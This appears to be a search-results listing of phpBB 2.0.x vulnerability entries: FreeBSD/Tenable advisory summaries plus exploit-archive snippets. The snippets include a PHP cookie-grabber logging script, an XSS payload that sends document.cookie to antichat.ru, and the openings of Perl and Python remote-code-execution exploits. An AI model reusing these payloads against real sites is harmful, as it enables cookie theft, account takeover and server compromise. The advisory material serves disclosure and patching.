2176 matches found
FreeBSD : phpbb (2258)
The following package needs to be updated: phpbb. (C) Tenable Network Security, Inc. This script contains information extracted from VuXML: Copyright 2003-2006 Jacques Vidrine and contributors. Redistribution and use in source (VuXML) and 'compiled' forms (SGML, HTML, PDF, PostScrip...
FreeBSD : phpbb -- multiple information disclosure vulnerabilities (03653079-8594-11d9-afa0-003048705d5a)
psoTFX reports : phpBB Group are pleased to announce the release of phpBB 2.0.12 the 'Horray for Furrywood' release. This release addresses a number of bugs and a couple of potential exploits. ... one of the potential exploits addressed in this release could be serious in certain situations and...
FreeBSD : phpbb -- remote PHP code execution vulnerability (4afacca1-eb9d-11d9-a8bd-000cf18bbe54)
FrSIRT Advisory reports : A vulnerability was identified in phpBB, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to an input validation error in the 'viewtopic.php' script that does not properly filter the 'highlight' parameter before calling the...
FreeBSD : phpbb -- multiple vulnerabilities (326c517a-d029-11d9-9aed-000e0c2e438a)
phpBB is vulnerable to remote exploitation of an input validation vulnerability that allows attackers to read the contents of arbitrary system files under the privileges of the webserver. This also allows remote attackers to unlink arbitrary system files under the privileges of the webserver...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
Exploit for unknown platform in category web applications ===================================================================== phpBB IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.php and chmod it to 777...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Cookie Grabber // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.p...
FreeBSD : phpBB session table exhaustion (a56a72bb-9f72-11d8-9585-0020ed76ef5a)
The includes/sessions.php unnecessarily adds session items to the session table and is therefore vulnerable to a denial-of-service attack. (C) Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the FreeBSD VuXML database : Copyrig...
FreeBSD : phpbb -- arbitrary command execution and other vulnerabilities (e3cf89f0-53da-11d9-92b7-ceadd4ac2edd)
The ChangeLog for phpBB 2.0.11 states : Changes since 2.0.10 - Fixed vulnerability in highlighting code very high severity, please update your installation as soon as possible - Fixed unsetting global vars - Matt Kavanagh - Fixed XSS vulnerability in username handling - AnthraX101 - Fixed not...
FreeBSD : multiple vulnerabilities in phpBB (c551ae17-7f00-11d8-868e-000347dd607f)
Users with admin rights can severely damage a phpBB installation, potentially triggered by viewing a page with a malicious link sent by an attacker.
FreeBSD : phpbb -- privilege elevation and path disclosure (53e711ed-8972-11d9-9ff8-00306e01dda2)
The phpbb developer group reports : phpBB Group announces the release of phpBB 2.0.13, the 'Beware of the furries' edition. This release addresses two recent security exploits, one of them critical. They were reported a few days after .12 was released and no one is more annoyed than us, having to...
FreeBSD : phpbb -- Insufficient check against HTML code in usercp_register.php (4a0b334d-8d8d-11d9-afa0-003048705d5a)
Neo Security Team reports : If we specify a variable in the html code any type : hidden, text, radio, check, etc with the name allowhtml, allowbbcode or allowsmilies, is going to be on the html, bbcode and smilies in our signature. This is a low risk vulnerability that allows users to bypass...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=date"j F, Y, g:i a"; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP:...
phpbb <=2.0.16 bug
?php / Installation Path Disclosure Vulnerability phpBB = 2.0.16 Example: if isset$HTTPPOSTVARS'mode' || isset$HTTPGETVARS'mode' $mode = isset$HTTPPOSTVARS'mode' ? $HTTPPOSTVARS'mode' : $HTTPGETVARS'mode'; $mode = htmlspecialchars$mode; else $mode = ''; If you get url like...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure / 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit
No description provided by source. / 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit
Exploit for unknown platform in category web applications ==================================================== phpBB = 2.0.16 XSS Remote Cookie Disclosure Exploit ==================================================== / Post the below code into a new message. Example Output: ... - -...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure
/ 1 Change milw0rm.com to your domain.com 2 Post the below code into a new message. Example Output: ... - - 09/Jul/2005:03:09:13 -0500 "GET...
phpbb2015dad.txt
!/usr/bin/perl phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability This exploit gives the user all the details about the database connection such as database host, username, password and database name. Written by SecureD, gvr.securedgmailcom,2005 Greetings to GvR, Jumento, PP, CKrew &...
php2016.txt
From: "alex" Subject: XSS in nested tag in phpbb 2.0.16 Hi all! Example: color=EFEFEFurlwww.uturl=www.s=''style='font-size:0;color:EFEFEF'styl e='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://antic hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=nullstyle='font-size:0;/u rl/url'/colo...
phpbb2015.py.txt
!/usr/bin/pyth0n print "\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by [email protected]" print " well, just because there is none." import sys from urllib2 import Request, urlopen from urlparse import urlparse, urlunparse from urllib import quote as quoteplus INITTAG =...